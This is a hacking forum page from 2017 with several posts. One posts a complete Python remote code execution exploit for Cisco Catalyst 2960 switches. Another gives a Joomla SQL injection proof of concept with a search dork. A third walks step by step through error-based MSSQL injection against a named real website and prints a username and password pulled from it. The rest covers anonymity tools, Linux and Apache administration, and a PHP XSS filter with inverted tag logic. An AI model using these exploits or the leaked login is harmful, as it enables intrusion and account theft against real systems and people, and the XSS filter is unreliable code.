Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 25
» Latest member: Prayerful12
» Forum threads: 0
» Forum posts: 0

Full Statistics

Online Users
There are currently 6 online users.
» 0 Member(s) | 6 Guest(s)

Latest Threads
Anonymous Surfing
Forum: Hacking Tutorials
Last Post: InfoHack
04-16-2017, 09:41 AM
» Replies: 0
» Views: 102
Cisco Catalyst 2960 IOS 1...
Forum: Exploits
Last Post: InfoHack
04-14-2017, 11:37 AM
» Replies: 0
» Views: 155
Joomla FocalPoint 1.2.3 S...
Forum: Exploits
Last Post: InfoHack
04-14-2017, 11:35 AM
» Replies: 0
» Views: 64
Securizare server linux
Forum: Server
Last Post: InfoHack
04-11-2017, 02:55 PM
» Replies: 0
» Views: 86
Mic tutorial pentru Admin...
Forum: Server
Last Post: InfoHack
04-11-2017, 02:37 PM
» Replies: 0
» Views: 66
Protectie XSS
Forum: Coding
Last Post: InfoHack
04-08-2017, 06:26 PM
» Replies: 0
» Views: 125
[SQLi] Tutorial MsSQL Inj...
Forum: Hacking Tutorials
Last Post: InfoHack
04-08-2017, 06:08 PM
» Replies: 0
» Views: 86

 
  Anonymous Surfing
Posted by: InfoHack - 04-16-2017, 09:41 AM - Forum: Hacking Tutorials - No Replies

To Protect Your Privacy..!!

HOLA VPN
Hola is a peer to peer network that provides everyone on the planet with freedom to
access all of the Web! It works through the community of its users - Hola users help you
to access the web.

JonDo
JonDos publishes a new version of the JonDo-Software, an IP changer and IP anonymization program, that you can use for anonymous surfing in the Internet with high security anonymous proxy servers.
What is JonDo? 
JonDo is an open source and free-of-charge program for Windows, Linux and MacOS X. 
It hides the user's IP adress behind an anonymous IP address. In contrast to other anonymizers (VPNs, anonymous proxy servers), the user's anonymity stays protected even against the providers (operators) of the anonymous IP address.

TOR
Tor is very useful for online anonymity, its protect your privacy, defend against a form
of network traffic analysis. Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic 
allows others to track your behavior and interests.
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create
new communication tools with built-in privacy features. 
Tor to keep websites from tracking them and their family members, or to connect to
news sites, instant messaging services, or the like when these are blocked by their
local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site. 

Tortilla
It is an open source tools that allows users to securely, anonymously, and transparently route all TCP/IP and DNS traffic through Tor, regardless of the client software, and without relying on VPNs or additional hardware or virtual machines. 

ProXPN
ProXPN helps to upgrades your internet connection with VPN encryption secures all types of connections from DSL and cable to 3G gives you 100% private access to the internet get an IP address in the USA, UK, or NL.
It Protects websites you visit, hijack your passwords, credit cards, or banking details intercept and spy on your email, IMs, calls, or anything else, record your web,history, run traces to find out where you live.

UltraVPN - A Free VPN
UltraVPN is a simple user interface to connect or disconnect to our VPN servers.

To use UltraVPN, you need to right click on a traybar icon (on the bottom right of your screen) that looks like a computer with a red screen. After right clicking on it, choose "connect". 

It can be used by any individual who simply wants to protect his privacy, either on a LAN or a public hotspot.
Features:
You can connect or log in into MSN if it's blocked.
For use VoIP software like Skype if it's blocked.
UltraVPN protect your email and browsing privacy.

How can you download UltraVPN?
Download the software client and create account. You are now able to connect to the VPN.

Print this item

  Cisco Catalyst 2960 IOS 12.2(55)SE11 Remote Code Execution
Posted by: InfoHack - 04-14-2017, 11:37 AM - Forum: Exploits - No Replies

Quote:
Code:
#!/usr/bin/python
# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow
# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
# Date: 04.10.2017
# Exploit Author: https://twitter.com/artkond
# Vendor Homepage: https://www.cisco.com/
# Version: IOS version c2960-lanbasek9-mz.122-55.SE11)
# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11
# CVE : CVE-2017-3881
# Description:
#
# The exploit connects to the Catalyst switch and patches
# it execution flow to allow credless telnet interaction
# with highest privilege level
#


import socket
import sys
from time import sleep

set_credless = True

if len(sys.argv) < 3:
   print sys.argv[0] + ' [host] --set/--unset'
   sys.exit()
elif sys.argv[2] == '--unset':
   set_credless = False
elif sys.argv[2] == '--set':
   pass
else:
   print sys.argv[0] + ' [host] --set/--unset'
   sys.exit()


s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))

print '[+] Connection OK'
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'



payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4'       # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x3d\x55\xdc'       # +8  address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
   payload += '\x00\x00\x99\x9c'   # +12 set  address of func that rets 1
else:
   payload +=  '\x00\x04\xeA\xe0'  # unset
payload += 'BBBB'                   # +16(+0) r1 points here at second gadget
payload += '\x00\xe1\xa9\xf4'       # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC'                   # +8
payload += 'DDDD'                   # +12
payload += 'EEEE'                   # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x7b\x5c'       # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x3d\x55\xc8'       # +8  r1+8 = 0x23d55c8
payload += 'FFFF'                   # +12
payload += 'GGGG'                   # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6c\xb3\xa0'       # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
   payload += '\x00\x27\x0b\x94'   # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr;
else:
   payload += '\x00\x04\xe7\x78'   # unset
payload += 'HHHH'                   # +12
payload += 'IIII'                   # +16(+0) r1 points here at fifth gadget
payload += '\x01\x4a\xcf\x98'       # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ'                   # +8 r1 points here at third gadget
payload += 'KKKK'                   # +12
payload += 'LLLL'                   # +16
payload += '\x01\x14\xe7\xec'       # +20 original execution flow return addr
payload += ':15:' +  '\xff\xf0'

s.send(payload)

print '[+] All done'

s.close()

Print this item

  Joomla FocalPoint 1.2.3 SQL Injection
Posted by: InfoHack - 04-14-2017, 11:35 AM - Forum: Exploits - No Replies

Quote:
Code:
# Exploit Title: Joomla Component FocalPoint 1.2.3 - SQL Injection
# Date: 2017-03-23
# Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/focalpoint/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Google Dork : inurl:index.php?option=com_focalpoint
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: WIN

# POC :

id Parameter Vulnerable to SQL Injection Put a String Value in id Parameter
http://www.target.com/index.php?option=com_focalpoint&view=location&id=[SQL]&Itemid=135

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers

Print this item

  Securizare server linux
Posted by: InfoHack - 04-11-2017, 02:55 PM - Forum: Server - No Replies

Mic tutorial ce contine sfaturi cu privire la securitatea unui box linux.

Atunci când vreti sa faceti server-ul dvs. Linux mai sigur, trebuie să va uitati la patru aspecte ale serverului:

1. Configuratia SSH
2. Configuratia IPTables (Firewall)
3. Loguri
4. Applicatii


SSH (Secure Shell)

Cele mai multe servere sunt atacate folosind “Brute force” impotriva SSH.
Puteti verifica acest lucru uitandu-va in fisierul /var/log/messages

Pentru a opri acest tip de atac, pur şi simplu, aveţi posibilitatea să modificaţi portul pe care ascultă pe SSH (implicit 22). Pentru a face acest lucru, trebuie să editaţi sshd.config situat în /etc/ssh/sshd.config. Utilizaţi următoarea comandă pentru a edita fişierul sshd.config:


Quote:
vim /etc/ssh/sshd.config


Cautati linia #Port 22, stergeti ‘#’ si modificati portul 22 in orice alt port care nu este folosit pe masina… de ex. 1022
Apoi nu uitati sa adaugati portul modificat in firewall pentru a va permite in continuare autentificarea.

Comanda:


Quote:
vim /etc/sysconfig/iptables



Si adaugati:

Quote:
iptables -A INPUT -p tcp -m tcp --dport 1022 -j ACCEPT


Restartati serviciul sshd:

Quote:
service sshd restart


Eu prefer pentru IPTABLES sa folosesc o politica de tipul DROP pentru o configuratie cat mai sigura
Comanda:
Quote:vim /etc/ssh/sshd.config
AllowUsers nume_utilizato


LOGuRI
Pentru a vedea logurile de securitate:

Quote:
tail /var/log/secure


Informatii hardware:
Quote:dmesg


Informatii de ansamblu asupra serverului:

Quote:tail /var/log/messages

Print this item

  Mic tutorial pentru Administratori incepatori – Server web Apache
Posted by: InfoHack - 04-11-2017, 02:37 PM - Forum: Server - No Replies

Apache este unul dintre serverele web cele mai frecvent utilizate. Dacă sunteţi nou in administrarea unui server web sau doar doriti să învatati pentru a menţine server-ul dvs. sub control, este util să ştii câteva comenzi de bază pentru Linux Apache. Cu excepţia cazului în care se prevede altfel – toate comenzile enumerate trebuie să fie executate la linia de comandă de pe server.

Cum sa pornesti, opresti si restartezi seviciul web Apache (comenzile trebuie executate din linie de comanda)?


Quote:Restart: “/etc/rc.d/init.d/apachectl restart”
Stop: “/etc/rc.d/init.d/apachectl stop”
Start: “/etc/rc.d/init.d/apachectl start”


Unde este fisierul de configurare httpd.conf?


Quote:“/etc/httpd/conf/httpd.conf”


Cate procese Apache ruleaza intr-un moment anume pe server?

Quote:“ps auwx |grep httpd |wc -l”


Unde se afla fisierul cu log-uri de erori pe server?


Quote:“/var/log/httpd/error_log”

Unde este fisierul cu log-uri de status ?


Quote:“/var/log/httpd/access_log”
Coduri HTTP pe care ar fi bine sa le stiti


Quote:200 = Successful Request
304 = Successful request, but the web page requested hasn’t been modified since the current version in the remote web browser’s cache.
401 = Unauthorized access. Someone entered an incorrect username / password on a password protected page
403 = Forbidden. File permissions prevents Apache from reading the file.
404 = Page Not found. The page requested doesn’t exist.
500 = Internal Server Error

Print this item

  Protectie XSS
Posted by: InfoHack - 04-08-2017, 06:26 PM - Forum: Coding - No Replies

Atacurile xss sunt printre cele mai intalnite in "lumea" web, majoritatea programatorilor incepatori le ignora mergand direct la protectia sql injection , insa atacurile xss sunt o problema deoarece se pot fura cookie, daca ai cookie poti fi acea persoana, chiar daca exista protectie csrf prin xss se poate trece de ea. PHP-ul ne pune la dispozitie functii care sa ne ajute gen strip_tags() htmlentities() , filter_var() mai sunt si altele dar pe astea o sa vi le prezint astazi. mai jos o sa va prezint o functie ce o folosesc eu pentru protectia xss:


Quote: <?php
/**  
* Protejeaza de atacuri xss  
* @param type string $str - stringul care trebuie protejat de xss  
* @param type string $allowable_tags - tagurile pe care nu le va elimina, exemplu <b>
*/
function strip_xss($str,$allowable_tags=false){
//daca sa setat tag care sa nu fie eliminat  
if(!$allowable_tags){
     
//facem strip_tags fara a elimina tagul(rile) dorit        
$rez = strip_tags($str,$allowable_tags);  
//altfel
}
else{
//facem strip_tags        
$rez = strip_tags($str);  
}
//daca se introduce javascript:alert() in input  
if(stripos($rez, "javascript:") !== false) {
//eliminam javascript:      
 $result = str_replace("javascript:","", htmlentities($rez, ENT_QUOTES));  
//altfel  
}
else {  
//tranformama in entitati html, protectia este pusa pentru " onchange="alert(document.cookie); etc        
$result = htmlentities($rez, ENT_QUOTES);
 }
return
$result;
}
?>

Nu va recomand sa folositi functia array_map() pentru a aplicata functia pe array-ul $_POST deoarece este posibil ca in anumite cazuri sa nu aveti nevoie de filtrare xss fie valorile sunt numere fie ca datele primite trebuie sa fie netransformate, asa ca ar fi ok daca ati folosi functia la preluarea datelor din formular.



Ca un caz extrem se poate folosi $_POST=array_map('strip_xss',$_POST) pentru a va proteja de xss.



Functia de mai sus merge pe versiunile >= 4 de php , php v 5 ne aduce functia filter_var care este un avantaj in filtrarea datelor


exemplu de folosire a functiei filter_var


Quote: <?php  $date['user'] = filter_var($_POST['user'], FILTER_SANITIZE_STRING); ?>

Sper sa va fie de folos ce am scris mai sus, va rog sa lasati comentariu in caz ca nu stiti ceva sau nu intelege-ti


Autor: mic_programator

Print this item

  [SQLi] Tutorial MsSQL Injection
Posted by: InfoHack - 04-08-2017, 06:08 PM - Forum: Hacking Tutorials - No Replies

Quote:(+) Target http://www.assiomforex.it/news/news?id=85


-----------------------Tutorialul Incepe-----------------------

1. Pentru a vedea daca site-ul este vulnerabil vom adauga langa ?id=85 having 1=1


Quote:http://www.assiomforex.it/news/news?id=85%20having%201=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'


[Microsoft][ODBC SQL Server Driver][SQL Server]La colonna 'News.idc_news' non è valida nell'elenco di selezione perché non è inclusa né in una funzione di aggregazione né nella clausola GROUP BY.


Quote:/news/news.asp, riga 30

Erroare, inseamna ca este vulnerabila.


2. Aflarea versiuni -->


Quote:+or+1=convert(int,(@@version))--


Quote:http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28@@version%29%29--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'


[Microsoft][ODBC SQL Server Driver][SQL Server]Conversione non riuscita durante la conversione del valore nvarchar 'Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64) Jun 17 2011 00:54:03 Copyright © Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1) (Hypervisor) ' nel tipo di dati int.


Quote:/news/news.asp, riga 30

3. Bazele de date -->


Quote:+or+1=convert(int,(db_name()))--

Quote: http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28db_name%28%29%29%29--

4. Extragerea tabelelor --> 

Quote:+or+1=convert(int,(select top 1 table_name from information_schema.tables))--


Quote:http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28select%20top%201%20table_name%20from%20information_schema.tables%29%29--

4.1 Continuarea extrageri --> Pentru a selecta mai multe tabele este necesar urmatorul query:


Quote:    +or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('TABEL')))-- [ In cazul nostru tabelul este "download"


Quote:http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20%28%27download%27%29%29%29--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'


[Microsoft][ODBC SQL Server Driver][SQL Server]Conversione non riuscita durante la conversione del valore nvarchar 'anno_mappatura' nel tipo di dati int.


Quote:/news/news.asp, riga 30

anno_mappatura este alt tabel, daca doriti sa continuati extragerea veti avea nevoie de urmatoarea "modificare": 


Quote: +or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('download','anno_mappatura')))--


Quote:http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20%28%27download%27,%27anno_mappatura%27%29%29%29--

De fiecare data cand incercati sa cautati celelalte tabele, trebuie modificat in primele paranteze tabelul prezent, in cazul nostru dupa download a fost anno_mappatura.


Voi sari peste restul extrageri pentru ca sunt foarte multe tabele, asa ca mergem direct la cel "principal" care ne intereseaza, si anume "userpassword"


Quote:http://www.assiomforex.it/news/news
?id
=85%20or%201%20=%20convert%20%28int,%28select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20%28%27download%27,%27anno_mappatura%27,%27funzione_mappatura%27,%27messagging_mappatura%27,%27atti%27,%27frontoffice_mappatura%27,%27citta_mappatura%27,%27files%27,%27rassegna%27,%27codice%27,%27contatti%27,'convenzioni','utenti','soci','riviste','questionario_domande','questionario_soci','fmlink','questionario','aste','libri','questionario_risultati','questionario_risposte','galleria','organigramma','profilo','sondaggio_grafici','Job','statuto','mailinglist_liste','verbali','sondaggio_compilazioni','mailinglist_indirizzi','mailinglist_riepilogo','Categorie','appoggio','regolamento'

%29%29%29--
5. Extragerea coloanelor din tabelul userpassword.



Veti avea nevoie de urmatorul query:



select * from userpassword having 1=1--



Microsoft OLE DB Provider for ODBC Drivers error '80040e14'


[Microsoft][ODBC SQL Server Driver][SQL Server]La colonna 'userpassword.txt_email' non è valida nell'elenco di selezione perché non è inclusa né in una funzione di aggregazione né nella clausola GROUP BY.


Quote:/news/news.asp, riga 30

Continuam aflarea coloanelor cu o metoda mai diferita decat la tabele:


Quote:select * from userpassword group by userpassword.txt_email having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]La colonna 'userpassword.txt_username' non è valida nell'elenco di selezione perché non è inclusa né in una funzione di aggregazione né nella clausola GROUP BY.


Quote:/news/news.asp, riga 30

Continuam: 


Quote:select * from userpassword group by userpassword.txt_email,userpassword.txt_username having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]La colonna 'userpassword.txt_password' non è valida nell'elenco di selezione perché non è inclusa né in una funzione di aggregazione né nella clausola GROUP BY.

/news/news.asp, riga 30 

Gata, avem coloanele: txt_username si txt_password

6. Extragerea datelor din txt_username si txt_password:

Quote:or 1 = convert (int,(select top 1 txt_username from userpassword))--


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversione non riuscita durante la conversione del valore varchar 'AlfieroAlb' nel tipo di dati int.


Quote:/news/news.asp, riga 30
 


Quote:or 1 = convert (int,(select top 1 txt_password from userpassword))--


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversione non riuscita durante la conversione del valore varchar '9ck8r59g' nel tipo di dati int.

/news/news.asp, riga 30 

Username: AlfieroAlb

Password: 9ck8r59g


// Shadow @ Thieves-Team



Print this item